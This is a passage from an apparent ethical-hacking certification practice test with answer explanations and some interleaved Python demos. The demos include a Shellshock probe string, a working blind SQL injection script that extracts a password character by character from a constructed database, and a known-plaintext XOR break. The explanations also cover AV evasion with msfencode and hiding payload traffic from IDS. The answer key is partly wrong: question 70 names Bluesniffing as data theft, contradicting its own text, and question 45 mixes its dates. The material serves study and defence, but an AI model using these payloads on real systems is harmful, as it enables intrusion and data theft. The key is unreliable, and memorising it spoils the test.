Nmap is a great scanner, and netcat can do wonders in setting up a backdoor and other tasks, but neither is designed for this task. Google Matrix does not exist.
Question 35 of 80
35. Question
An attacker takes advantage of a web application’s use of semicolons in communication with databases and enters additional strings to carry out malicious instructions. Which of the following best defines this attack?
Correct Answer:
CSPP is correct.
A connection string parameter pollution (CSPP) attack takes advantage of web applications that communicate with databases by using semicolons to separate parameters. An attacker can end a parameter prematurely with a semicolon and then add his own code.
Incorrect Answers:
XSS, CSRF, and CSRF are incorrect.
These attacks do not match the description.
Question 36 of 80
36. Question
An attacker places his sites on a specific group. After several days of monitoring the group members’ traffic, he notes several websites they frequently visit and goes to work infecting those sites with malware. Which of the following best defines this attack?
Correct Answer:
Watering hole attack is correct.
I will admit, prior to preparing for this book, I’d never heard of the watering hole attack. You might ask why one would go through the trouble of infecting multiple websites that have nothing to do with the target when they could otherwise spend that time attacking…well…the target—but c’est la vie. In this attack, the goal is to gain access to a machine owned by one of the target group’s members. By infecting sites the team members visit frequently, sometimes with unknown (zero-day) exploits, the attacker can get members’ machines infected and use that to attack the rest of the group.
Incorrect Answers:
Shellshock (a.k.a. Bashdoor) is a Linux vulnerability that allows an attacker to cause vulnerable versions of Bash to execute arbitrary commands.
Heartbleed is an SSL vulnerability that exploits the heartbeat issue in data transfer.
Spray and pray isn’t an attack name that I’m aware of (but it should be, because it sounds really cool).
Question 37 of 80
37. Question
Which cloud deployment model provides services over a network that is open for public use?
Correct Answer:
Public is correct.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet). Public cloud is generally used when the security and compliance requirements found in large organizations aren’t a major issue.
Incorrect Answers:
Private, Community, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Question 38 of 80
38. Question
An attacker gains access to an internal machine. He then uses Metasploit to access and attack other internal systems from that machine. Which of the following terms describes this?
Correct Answer:
Pivoting is correct.
Pivoting is using a compromised system as a launching point into other systems. After the first system is owned, you can add a route statement in Metasploit to access the network beyond it.
Incorrect Answers:
Fuzzing, Patching, and Switching are incorrect.
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Question 39 of 80
39. Question
An attacker tells an employee she has left her badge at home and asks for the door to be held open. Which attack is in play here?
Correct Answer:
Piggybacking is correct.
Piggybacking is different from tailgating in that there is no fake badge in play: the attacker doesn’t have a badge but asks for someone to let her in anyway.
Incorrect Answers:
Tailgating, Propping, and Shoulder surfing are incorrect.
Tailgating makes use of a fake badge.
Shoulder surfing occurs when the attacker is already inside the building.
Propping is not a valid term.
Question 40 of 80
40. Question
Which of the following attacks causes a web browser to send a request that the browser’s user did not intend to send?
Correct Answer:
CSRF is correct.
Of the answers provided, a cross-site request forgery (CSRF) is the most likely culprit. In a CSRF attack, the user is tricked (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website. The malicious website can then instruct the user’s web browser to send a request to the target website.
Incorrect Answers:
Buffer overflow, XSS, and SQL injection are incorrect.
Buffer overflows allow attackers to inject malicious code into a system’s memory.
XSS executes code within a trusted context on the site itself.
SQL injection uses SQL statements injected into a form or front end to accomplish back-end tasks.
Question 41 of 80
41. Question
A web application in your organization provides significant benefit to the accounting team. However, after a vulnerability scan and a risk assessment, it is determined the application presents significant risk if exposed to external attackers. The server hosting the application is moved inside the DMZ, and strong access controls are put into place allowing only the accounting team to use it. Which of the following best describes the risk method used here?
Correct Answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are designed to mitigate the risk—greatly reducing the likelihood it will ever happen.
Incorrect Answers:
The organization is accepting the risk, The organization is transferring the risk, and The organization is avoiding the risk are incorrect.
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk involves removing it altogether.
Question 42 of 80
42. Question
In which phase of an ethical hack would an attacker identify live targets and discover information about them, such as OS, vulnerabilities present, and IP address?
Correct Answer:
Scanning is correct.
There are five stages in an ethical hack—reconnaissance, scanning, gaining access, maintaining access, and clearing tracks. In this case, the attacker is using ping as well as port and vulnerability scanners to discover live targets and prepare attacks against them.
Incorrect Answers:
Attack, Reconnaissance, Pre-attack, and Gaining access are incorrect.
Attack and pre-attack are two of the three pen test stages (post-attack being the only one left). Reconnaissance would be using public records and such to gather useful information. Gaining access is where the fun starts—attacking to find a way in.
Question 43 of 80
43. Question
After the three-way handshake, which flag is set in packets sent in either direction?
Correct Answer:
ACK is correct.
After the three-way handshake is completed, an ACK flag is set in every packet sent.
Incorrect Answers:
SYN, FIN, and XMAS are incorrect.
The remaining TCP flags do not appear in every packet.
Question 44 of 80
44. Question
Which of the following would be the best defense against sniffing in your organization’s network?
Correct Answer:
Use encryption throughout the network is correct.
Of the choices provided, encrypting communications between endpoints on your network does the best job of preventing successful sniffing. Someone may find a way to connect and sniff traffic, but if it’s all encrypted they won’t receive much of value.
Incorrect Answers:
Implement MAC filtering on wireless access points, Use static IP addressing, and Ensure strong physical security controls prevent unauthorized access to the server room are incorrect.
MAC filtering is a good idea on a WAP; however, anyone can spoof a MAC address and sniff anyway. Static IP addressing won’t do a thing to prevent sniffing. Strong security measures throughout your organization will definitely make it harder to pull off a sniffing attack, but on its own this answer protects just the server room—sniffing can be carried out from nearly any available port.
Question 45 of 80
45. Question
One of the largest consumer credit card and data thefts happened to the retailer T.J.Maxx in 2005. Which of the following technologies was exploited to allow for the data theft?
Correct Answer:
WEP is correct.
In 2007, WEP was well on its way out. WPA first became available in 2003, and security flaws in WEP were well known and easily exploitable. Per accounts written in the Wall Street Journal and ZDNet, T.J.Maxx’s parent company chose to secure its wireless network using Wired Equivalent Privacy (WEP), and used wireless to transmit data between price-checking devices, cash registers, and computers. Hackers broke the WEP encryption at a Minnesota storefront and collected information submitted by employees logging on to the company’s central database in Massachusetts, stealing usernames and passwords. Hackers then created their own user accounts, and the rest is history (the theft included millions of credit card numbers).
Incorrect Answers:
WPA, WPA2, and Rogue access points are incorrect.
The use of WPA or WPA2 may have actually prevented the attack. A rogue access point was not the primary vulnerability exploited.
Question 46 of 80
46. Question
Amazon’s EC2 provides virtual machines that can be controlled through a service API. Which of the following best defines this service?
Correct Answer:
IaaS is correct.
Amazon’s EC2 provides resizable compute capacity in the cloud via VMs that can be controlled via an API, thus fitting the definition of IaaS.
Incorrect Answers:
PaaS, SaaS, and Public are incorrect.
These do not match the Amazon EC2 service description.
Question 47 of 80
47. Question
Which of the following SIDs captured during a test represents the true administrator account on a Windows machine?
Correct Answer:
S-1-5-21-1374882321-2871566290-774930401-500 is correct.
The security identifier is used to identify a security principal and is unique to each account and service. In a Windows system, the true administrator account always has a relative identifier (RID) of 500—shown at the tail end of the SID.
Incorrect Answers:
S-1-5-21-1374882321-2871566290-774930401-1100, S-1-5-21-1374882321-2871566290-774930401-1101, and S-1-5-21-1374882321-2871566290-774930401-501 are incorrect.
RID values between 1000 and 1500 indicate a standard user account. The RID 501 indicates the guest account.
Question 48 of 80
48. Question
Which of the following Metasploit framework tools can assist a pen tester in evading AV systems?
Correct Answer:
msfencode is correct.
Msfencode allows the tester to encode the payload. In other words, you can change the way it appears to an AV system. The following is from Offensive Security’s site: “Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target.”
Incorrect Answers:
msfcli, msfpayload, and msfd are incorrect.
These do not address evasion.
Question 49 of 80
49. Question
Which of the following attacks injects parameters into a connection string using semicolons as separators?
Correct Answer:
CSPP is correct.
Originally highlighted at a BlackHat conference back in 2010 (www.blackhat.com), the connection string parameter pollution (CSPP) attack can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out and the potential results it can have.
Incorrect Answers:
XSS, CSRF, and SQL injection are incorrect.
These choices do not accurately reflect the method(s) used in this attack.
Question 50 of 80
50. Question
During investigation of system security, you discover the HttpOnly flag is set in cookies. Which of the following is most likely being mitigated by this attempt?
Correct
Correct Answer:
XSS is correct. Of the answers provided, XSS is the only one that makes sense. This setting prevents cookies from being accessible by a client-side script.
Incorrect Answers:
CSRF, CSPP, and Buffer overflow are incorrect.
Cross-site request forgery (CSRF) tricks a user (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website (the malicious website can then instruct the user’s web browser to send a request to the target website).
CSPP (connection string parameter pollution) is an injection attack that takes advantage of web applications using semicolons to separate parameters in database communication.
Buffer overflow has absolutely nothing to do with this question.
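A defender-side check for this flag, as an added example that is not part of the test material: it parses the Set-Cookie headers of a response (the sample headers are constructed), reports which cookies remain readable by client-side script because HttpOnly is absent, and shows how the Python standard library emits a cookie with the flag set. The helper names are mine, not from any library or the quiz.

```python
"""Audit Set-Cookie headers for HttpOnly (plus Secure and SameSite).

Added example. The response headers below are constructed for the demo.
"""
from dataclasses import dataclass, field
from http.cookies import SimpleCookie
from typing import Iterable, List, Sequence, Tuple


@dataclass
class CookieFinding:
    name: str
    missing: List[str] = field(default_factory=list)

    @property
    def script_readable(self) -> bool:
        # Without HttpOnly, document.cookie can read the value in the browser,
        # which is what an injected script (XSS) would use to steal a session.
        return "HttpOnly" in self.missing


def parse_set_cookie(header_value: str) -> Tuple[str, set]:
    """Split one Set-Cookie value into (cookie name, lower-cased attribute names)."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs


def audit_set_cookie(
    header_value: str,
    required: Sequence[str] = ("HttpOnly", "Secure", "SameSite"),
) -> CookieFinding:
    """Report which of the required attributes a single Set-Cookie lacks."""
    name, attrs = parse_set_cookie(header_value)
    missing = [r for r in required if r.lower() not in attrs]
    return CookieFinding(name=name, missing=missing)


def audit_response_headers(headers: Iterable[Tuple[str, str]]) -> List[CookieFinding]:
    """headers: (name, value) pairs as received from an HTTP response."""
    return [audit_set_cookie(v) for n, v in headers if n.lower() == "set-cookie"]


def hardened_session_cookie(name: str, value: str) -> str:
    """Build a Set-Cookie value with HttpOnly, Secure and SameSite=Lax set,
    using the standard library's SimpleCookie (a hypothetical helper name)."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True   # not exposed to document.cookie
    jar[name]["secure"] = True     # only sent over HTTPS
    jar[name]["samesite"] = "Lax"  # limits cross-site sends (CSRF exposure)
    jar[name]["path"] = "/"
    return jar[name].OutputString()


# Constructed sample response headers: one hardened cookie, two weak ones.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"),
    ("Set-Cookie", "prefs=dark; Path=/"),
    ("Set-Cookie", "csrftoken=xyz; Path=/; Secure"),
]

if __name__ == "__main__":
    for finding in audit_response_headers(SAMPLE_HEADERS):
        status = "OK" if not finding.missing else "missing " + ", ".join(finding.missing)
        print(f"{finding.name}: {status}")
    print("hardened:", hardened_session_cookie("sessionid", "abc123"))
```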
Question 51 of 80
51. Question
Which of the following statements best describes the term “likelihood” in regard to risk management?
Correct
Correct answer:
Likelihood is the probability that a threat will exploit a particular vulnerability is correct.
Risk management is filled with terms like “threat,” “exposure,” “residual,” and tons of others. Likelihood is the probability that a threat (sometimes referred to as a threat source or a threat agent) will exploit a particular vulnerability. For example, a grizzly bear is a threat to my laptop, but the likelihood of one barreling through my window and destroying my system is really low.
Incorrect answers:
Likelihood is the possibility risk exists in the environment, Likelihood is the possibility of a threat existing, and Likelihood is the probability of a risk exploiting a threat are incorrect.
None of the other answers correctly describes likelihood.
Question 52 of 80
52. Question
An organization implements an access control system that allows the data owner to set security permissions on an object. Which of the following best describes this?
Correct
Correct Answer:
Discretionary access control is correct.
Discretionary access control (DAC) is a system allowing the data owner to set security permissions for the object. If you’re on a Windows machine right now, you can create files and folders and then set sharing and permissions on them as you see fit.
Incorrect Answers:
Mandatory access control (MAC) assigns sensitivity labels to data and controls access by matching the user’s security level to the resource label.
RBAC can use either DAC or MAC to get the job done. The goal is to assign a role, and any entity holding that role can perform the duties associated with it. Users are not assigned permissions directly; they acquire them through their role (or roles).
The term authorized access control does not exist.
Question 53 of 80
53. Question
Which of the following is the least likely step you should take in recovering from a malware infection?
Correct
Correct Answer:
Back up the hard drive is correct.
Backing up a hard drive when you know there’s an infection makes as much sense as putting sugar on your grits. It’s a horrible idea and just doesn’t work. Why copy the malware?
Incorrect Answers:
Delete system restore points, Remove the system from the corporate network, and Reinstall the OS from original media are incorrect.
Deleting restore points is a good idea because you don’t know when you were infected. Removing the system from the network makes obvious sense, as does restoring the OS from original media. Be careful with any backup restoration—you must ensure the backups are clean before reusing.
Question 54 of 80
54. Question
Which nmap script helps with detection of potentially risky HTTP methods?
Correct
Correct answer:
http-methods is correct.
The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is if not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
http enum, http-get, and http-headers are incorrect.
These are not scripts in nmap to show HTTP methods.
Question 55 of 80
55. Question
Which of the following statements are true regarding active sniffing? (Choose all that apply.)
Correct
Correct Answer:
Active sniffing is used when you are on a switch and Active sniffing is easier to detect than passive sniffing are correct.
If you’re connected to a switch, you’re on your own collision domain—meaning you’ll only see traffic intended for your port. Active sniffing is typically required in order to force the switch to send you other traffic to sniff. Active attacks, by their nature, are easier to detect—you’re actively injecting packets to make your sniffing efforts successful; therefore, there’s something to see.
Incorrect answers:
Active sniffing is used when you are on a hub and Active sniffing is harder to detect than passive sniffing are incorrect.
Hubs share a collision domain, so passive sniffing is all that’s necessary. And it’s worlds more difficult to detect a passive sniffer—after all, they’re just sitting there doing nothing but listening.
Question 56 of 80
56. Question
Bart is working on a business impact assessment (BIA) and performs calculations on various systems to place value on them. On a certain server he discovers the following:
• The server costs $2500 to purchase.
• The server typically fails once every five years.
• The salary for the repair technician to restore a server after failure is $40 an hour, and it typically takes two hours to fully restore a server.
• The accounting group has five employees paid $25 an hour who are at a standstill during an outage.
What is the ALE for the server?
Correct
Correct answer:
$566 is correct.
ALE = ARO × SLE. To find the correct annualized loss expectancy, multiply the percentage of time it is likely to occur annually (annual rate of occurrence, in this case 0.2, or 1 failure / 5 years = 20%) by the amount of cost incurred from a single failure (single loss expectancy [in this case, $80 for the repair guy] + $250 [5 employees at $25 an hour for 2 hours] + $2500 [replacement of the server] = $2830). ALE = 0.2 × $2830, so the ALE in this case is $566.
Incorrect answers:
20% is the ARO for this scenario (1 failure / 5 years).
$2830 is the SLE for this scenario (repair guy cost + lost work from accounting guys + replacement of server, or $80 + $250 + $2,500).
$500 would be the ALE if you did not take into account the technician and lost work production.
Question 57 of 80
57. Question
You are performing an ACK scan against a network from an external location. You’ve identified two web servers on the DMZ subnet and notice that they are responding to the ACK scan. Which of the following best describes the situation?
Correct
Correct answer:
The firewall for the DMZ subnet is not performing stateful inspection is correct. A stateful inspection firewall would notice the ACK coming unsolicited and from the wrong side of the fence.
Incorrect answers:
They are both IIS servers, They are both Apache servers, and The IDS is not functioning for the DMZ subnet are incorrect.
There is no way to tell, from the information provided, what type of web server is responding.
The IDS is passive/reactive and would not prevent the packet flow anyway.
Question 58 of 80
58. Question
You send an e-mail to an address inside the target organization; however, you purposefully misspell the address to ensure it will not go to an existing mailbox. Which of the following is the best reason for doing this?
Correct
Correct Answer:
To reveal information about the target’s e-mail servers is correct. If you purposefully send an e-mail to an address you know is not valid, the servers at your target take a look at the address and decide what to do with it. This effort can elicit a response that can provide insight into e-mail handling.
Incorrect Answers:
To test the target’s antivirus solution, To test the target’s spam filters, and To reveal information about the e-mail administrator’s root access are incorrect. This effort is definitely not testing the AV systems of the target, and testing the spam filter would usually require a valid e-mail address to send to.
Question 59 of 80
59. Question
You start traceroute from your system to a remote machine. Which of the following statements is true regarding your attempt?
Correct
Correct answer:
The first ICMP packet leaving your machine has a hop count of 1 is correct.
Traceroute works by incrementing the TTL on each packet it sends by 1 after each hop is hit and returns, thus ensuring the response comes back explicitly from that hop and returns its name and IP address. Thus, TTL is set to 1 for the first round, then incremented to 2 for the next, and so on.
Incorrect answers:
The first ICMP packet leaving your machine has a hop count of 0, The first ICMP packet leaving your machine has an unlimited hop count, and The first ICMP packet leaving your machine carries a hello packet in the payload are incorrect.
These answers do not represent how traceroute works.
Question 60 of 80
60. Question
An attacker leverages IoT vulnerabilities to shut off the air conditioning on the data floor, causing a major disruption. What is this attack called?
Correct
Correct Answer:
HVAC attack is correct.
Yes, this is really what it’s called. No, I’m not making it up. An HVAC attack takes place when one hacks IoT devices in order to shut down air conditioning services.
Incorrect Answers:
Although SCADA may have appealed to you here, it’s incorrect in this scenario (SCADA and IoT don’t necessarily have anything to do with one another).
A DoS may have occurred here, but there’s no specific indication it occurred.
Zigbeez doesn’t exist.
Question 61 of 80
61. Question
You are performing reconnaissance on a target and want to see domain name registration contact information. Which of the following is your best choice?
Correct
Correct answer:
Whois is correct.
Whois provides information on registrants—technical POCs, who registered the domain, contact numbers, and so on.
Incorrect answers:
CAPTCHA is a means to distinguish human from machine input, where a text entry or a picture identification requires a real human to click or enter it.
IANA regulates IP allocation, and IETF is a standards organization.
Question 62 of 80
62. Question
A pen tester wants to deliver a payload to a target inside the organization without alerting any monitoring teams. A peer recommends session splicing as an option for IDS evasion. If the pen tester has access to the target already, which of the following methods represents another possible option?
Correct
Correct Answer:
Encrypt the traffic between you and the host is correct.
Assuming you can set up encryption between the target host and the attacking machine, this is the best option. Encryption hides everything from view; therefore, the IDS and those pesky security teams monitoring the perimeter won’t see the traffic. Could an encrypted tunnel in and out of the boundary alert? Perhaps—so don’t leave it up long.
Incorrect Answers:
Starting a fake attack to draw attention away can definitely provide cover fire and is a great technique in the real world; however, by design it alerts the security team, so it’s not apropos here.
Session hijacking doesn’t apply in this situation.
A connection between the target host and the attacking machine does not mean the IDS and monitoring teams turn a blind eye.
Question 63 of 80
63. Question
Which of the following best describes the amount of risk that remains after mitigation efforts to correct a vulnerability have been taken?
Correct
Correct Answer:
Residual is correct.
Residual risk is that which remains after your fix efforts have been completed.
Incorrect Answers:
Inherent risk is that which is currently there—inherited from the current situation and circumstances.
Deferred risk is risk you wish to deal with later.
Impartial is a distractor.
Question 64 of 80
64. Question
Which of the following describes a vulnerability allowing attackers to execute concatenated commands in bash?
Correct
Correct Answer:
Shellshock is correct.
Shellshock works by causing Bash to unintentionally execute commands when the commands are concatenated (usually via CGI) to the end of function definitions stored in the values of environment variables.
Incorrect Answers:
WannaCry, POODLE, and Heartbleed are incorrect.
These vulnerabilities do not match the described condition.
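The classic local diagnostic for the condition described above, wrapped in Python so it can be run from a host-checking script. This is an added example, not material from the original test: it exports the well-known public probe string (a no-op function followed by an extra command) into the environment of a child bash and reports whether the trailing command ran. The variable name SHELLSHOCK_PROBE and the return values are this example's own conventions.

```python
"""Shellshock diagnostic: does the local bash execute a command appended to
an exported function definition?  Added example, not part of the original test.

The probe below is the public test string: a no-op function body followed by
an extra command after the closing brace.  A patched bash either ignores the
variable (it only imports functions from BASH_FUNC_* names now) or imports
the function without running the tail; a vulnerable bash runs the tail while
importing its environment, before `-c` is even looked at.
"""
import os
import shutil
import subprocess

# Classic probe: a no-op function, then a command that should never run.
PROBE = "() { :; }; echo VULNERABLE"


def shellshock_check(bash_path=None):
    """Return 'vulnerable', 'patched', or 'no-bash'.

    bash_path: optional explicit interpreter to test (hypothetical parameter
    for this example); defaults to the first bash on PATH.
    """
    bash = bash_path or shutil.which("bash")
    if not bash or not os.access(bash, os.X_OK):
        return "no-bash"
    env = dict(os.environ)
    env["SHELLSHOCK_PROBE"] = PROBE          # exported into the child's environment
    # The child is told only to echo a marker; any other output came from the probe.
    proc = subprocess.run(
        [bash, "-c", "echo marker"],
        env=env, capture_output=True, text=True, timeout=10,
    )
    if "VULNERABLE" in proc.stdout:
        return "vulnerable"
    return "patched"


if __name__ == "__main__":
    print(shellshock_check())
```

The check is deliberately harmless: the injected command only prints a marker, so it is safe to run on production hosts as part of a baseline audit. Remote exposure still depends on whether anything on the host (CGI handlers, DHCP clients, SSH forced commands) passes attacker-controlled values into Bash's environment.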
Question 65 of 80
65. Question
In which phase of a pen test is scanning performed?
Correct
Correct Answer:
Pre-attack is correct.
Pen tests have pre-attack, attack, and post-attack phases. Scanning takes place in the pre-attack phase, alongside footprinting and enumeration.
Incorrect Answers:
Scanning does not take place in the attack or post-attack phase.
Reconnaissance is an activity within the pre-attack phase, not a phase of its own, so it is a distractor in this case.
Question 66 of 80
66. Question
Which of the following provides the integrity method for WPA2?
Correct
Correct Answer:
CCMP is correct.
WPA kept WEP's RC4 stream cipher and wrapped it in TKIP as a stopgap for existing hardware, and TKIP has known weaknesses. Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), built on AES, replaced it and provides both the confidentiality and the integrity method used by Wi-Fi Protected Access 2 (WPA2).
Incorrect Answers:
RC4, AES, and 802.1x are incorrect.
RC4 and AES are encryption algorithms, not integrity methods: RC4 is the stream cipher behind WEP and WPA/TKIP, and AES is the block cipher that CCMP is built on in WPA2. 802.1X is the port-based network access control standard used for enterprise wireless authentication; wireless LANs themselves come from the 802.11 family of standards.
Question 67 of 80
67. Question
A pen test member verifies the entire IP address range owned by the target, discovers details of their domain name registration, and visits job boards and financial websites regarding the target. What activity is being performed?
Correct
Correct Answer:
Passive footprinting is correct.
Passive footprinting is all about things that are publicly available and don’t expose you to great risk of discovery.
Incorrect Answers:
Vulnerability assessment, Active footprinting, and Security assessment are incorrect.
A vulnerability assessment touches each system looking for open vulnerabilities that can be exploited.
Active footprinting puts you at greater risk of discovery (network sniffing and social engineering, for example).
Security assessment is a term associated with an overall penetration test.
Question 68 of 80
68. Question
You are concerned about static electricity problems in your data center. Which of the following will not assist you in dealing with the problem?
Correct
Correct Answer:
Positive pressure is correct.
Positive pressure is great at keeping contaminants (dust, dirt, and so on) out of the data center, but it doesn't do a thing regarding static electricity.
Incorrect Answers:
Antistatic wrist straps are designed to ground you appropriately, providing somewhere for any latent static electricity you've generated to flow.
Same with proper grounding systems for everything else. More humidity equals less static electricity, so a humidity control system is an absolute requirement.
Question 69 of 80
69. Question
Which of the following laws protects the confidentiality and integrity of personal information collected by financial institutions?
Correct
Correct Answer:
GLBA is correct.
The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to take steps to protect customer information. It also forces them to provide their privacy practices to the public.
Incorrect Answers:
HIPAA deals with the protection of personal data in the medical realm.
SOX deals with publicly traded companies, forcing them to allow independent audits and to post financial findings.
PCI DSS is in place to secure data used in credit card transactions and storage.
Question 70 of 80
70. Question
Which Bluetooth attack is used in an attempt to steal data from the device?
Correct
Correct Answer:
Bluesniffing is correct.
Bluesniffing is the effort to capture Bluetooth traffic and locate devices, the eavesdropping step that precedes any actual extraction of data.
Incorrect Answers:
Bluesmacking is a DoS attack that sends oversized L2CAP ping packets to the device.
Bluesnarfing is the actual theft of data (contacts, calendars, files) from a Bluetooth device, typically over the OBEX service.
Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Question 71 of 80
71. Question
A pen tester is attempting to inject SQL queries based solely on responses to true/false questions. Which of the following best describes the action he is taking?
Correct
Correct Answer:
Blind SQL injection is correct.
Blind (also known as inferential) injection occurs when the application is injectable but returns neither error messages nor query results to the attacker. If the administrator ensures that only generic responses come back, the attacker can still ask the database true-or-false questions (boolean-based) or force a measurable delay (time-based) and infer the answer from the application's behaviour, typically extracting a value one character at a time. Because this is guesswork and trial and error, the attack takes many requests and a long time to pull off by hand, although tools automate it. The fix is the same as for any injection: bind user input as a query parameter instead of concatenating it into the SQL string.
Incorrect Answers:
Hunt SQL, Compound SQL, and SQLi guess are incorrect.
These injection types do not exist.
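The true/false extraction described above, carried out against a constructed in-memory SQLite application. This is an added example and not code from the original test: the table, the row, the `lookup_vulnerable` and `lookup_hardened` functions and the secret value are all invented here. The application answers only "found" or "not found", yet the injectable version leaks the password one character at a time, while the bound-parameter version gives the same probes nothing.

```python
"""Boolean-based blind SQL injection against a constructed SQLite "app".
Added example, not part of the original test.

The hypothetical application answers only True (row found) / False, never
an error message or row data.  The attacker still extracts a secret one
character at a time by asking true/false questions, because the vulnerable
lookup concatenates user input into SQL.  The hardened lookup binds the
value, so the same probes are treated as a literal (non-existent) username.
"""
import sqlite3
import string

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice', 'S3cret!')")   # constructed row


def lookup_vulnerable(name):
    """Returns only True/False, but builds the SQL by string concatenation."""
    sql = "SELECT 1 FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def lookup_hardened(name):
    """Same interface; the value is bound, so it can never alter the query."""
    sql = "SELECT 1 FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


# Candidate characters; the single quote is left out so each probe stays
# syntactically valid (a real tool would encode or test it separately).
ALPHABET = "".join(c for c in string.ascii_letters + string.digits + string.punctuation
                   if c != "'")


def extract_password(oracle, target_user="alice", max_len=32):
    """Inferential extraction: one true/false question per candidate character.

    oracle: a function taking the user-supplied name and returning True/False.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            # substr() is 1-indexed in SQLite; the trailing comment swallows
            # the closing quote the application appends.
            probe = f"{target_user}' AND substr(password,{pos},1)='{ch}' -- "
            if oracle(probe):
                recovered += ch
                break
        else:
            return recovered          # no candidate matched: end of the value
    return recovered


if __name__ == "__main__":
    print(extract_password(lookup_vulnerable))        # the constructed secret
    print(repr(extract_password(lookup_hardened)))    # nothing leaks
```

Each recovered character costs up to one request per alphabet entry, which is why blind injection is slow but entirely mechanical; a binary search over character codes (`substr(...) > 'm'`) cuts that to a handful of requests per character.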
Question 72 of 80
72. Question
An attacker performs reconnaissance and learns the organization’s SSID. He places an access point inside a closet to trick normal users into connecting to it, and then he begins redirecting them to malicious sites. Which of the following categorizes this attack?
Correct
Correct Answer:
Evil twin attack is correct.
An evil twin is a rogue access point configured to broadcast the organization's own SSID so that clients associate with it instead of the legitimate AP; once users connect, the attacker sits in the path of their traffic and can redirect them. Evil twins are usually discovered quickly where a wireless IDS or regular rogue-AP scanning is in place; however, there are lots of organizations that don't regularly scan for them.
Incorrect Answers:
A replay attack occurs when communications (usually authentication related) are recorded and replayed by the attacker.
Closet AP and WEP nap aren't legitimate terms.
Question 73 of 80
73. Question
In a known-plain-text attack, what does the attacker have access to?
Correct
Correct Answer:
Both plain text and cipher text is correct.
In a known-plain-text attack, the attacker has one or more plain-text messages together with their cipher-text counterparts and uses the pairs to recover the key or keystream, or to find patterns that break other cipher texts produced under the same key.
Incorrect Answers:
The plain text only, The cipher text only, and None of the above are incorrect.
Having only cipher text is a cipher-text-only attack; having only plain text gives nothing to compare against. Neither describes a known-plain-text attack.
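A worked instance of the attack on a cipher where one known pair is fatal: repeating-key XOR. This is an added example, not part of the original test; the toy cipher, the key `k3y!` and both messages are constructed for the demonstration. XOR-ing the known plain text with its cipher text yields the keystream, the keystream's period gives the key, and the key decrypts a second message the attacker never had in the clear.

```python
"""Known-plaintext attack on a repeating-key XOR cipher.
Added example, not part of the original test.

Two messages were encrypted with the same key; the attacker holds the plain
text of one of them plus both cipher texts.  P xor C reveals the keystream,
whose repetition reveals the key, which then decrypts the other message.
The key and both messages are constructed for the demonstration.
"""


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Toy cipher: repeating-key XOR (decryption is the same operation)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_keystream(known_plain: bytes, known_cipher: bytes) -> bytes:
    """The core of the known-plaintext attack: keystream = P xor C."""
    if len(known_plain) != len(known_cipher):
        raise ValueError("plain text and cipher text must be the same length")
    return bytes(p ^ c for p, c in zip(known_plain, known_cipher))


def shortest_period(stream: bytes) -> int:
    """Smallest period that reproduces the whole stream (the key length).

    Only meaningful when the known plain text is at least as long as the key;
    a shorter sample can be explained by a shorter, wrong period.
    """
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)


def decrypt_other(known_plain: bytes, known_cipher: bytes, target_cipher: bytes) -> bytes:
    """Recover the key from one known pair, then decrypt a second cipher text."""
    stream = recover_keystream(known_plain, known_cipher)
    key = stream[: shortest_period(stream)]
    return xor_encrypt(target_cipher, key)


KEY = b"k3y!"                                              # constructed secret key
KNOWN_PLAIN = b"HELLO WORLD, THIS IS A PUBLIC GREETING"   # e.g. a fixed header
KNOWN_CIPHER = xor_encrypt(KNOWN_PLAIN, KEY)
TARGET_CIPHER = xor_encrypt(b"wire 10000 to account 42", KEY)   # attacker's goal

if __name__ == "__main__":
    print(decrypt_other(KNOWN_PLAIN, KNOWN_CIPHER, TARGET_CIPHER))
```

The same principle, with far more work, is what known-plaintext analysis does against real ciphers: predictable headers, padding and boilerplate give the attacker the plain-text side of the pair for free, which is why key reuse and structure in the plain text are treated as cryptographic risks.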
Question 74 of 80
74. Question
Which of the following best describes the role that the U.S. Computer Security Incident Response Team (CSIRT) provides?
Correct
Correct answer:
A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security is correct. CSIRT provides incident response services for any user, company, agency, or organization in partnership with the Department of Homeland Security.
Incorrect answers:
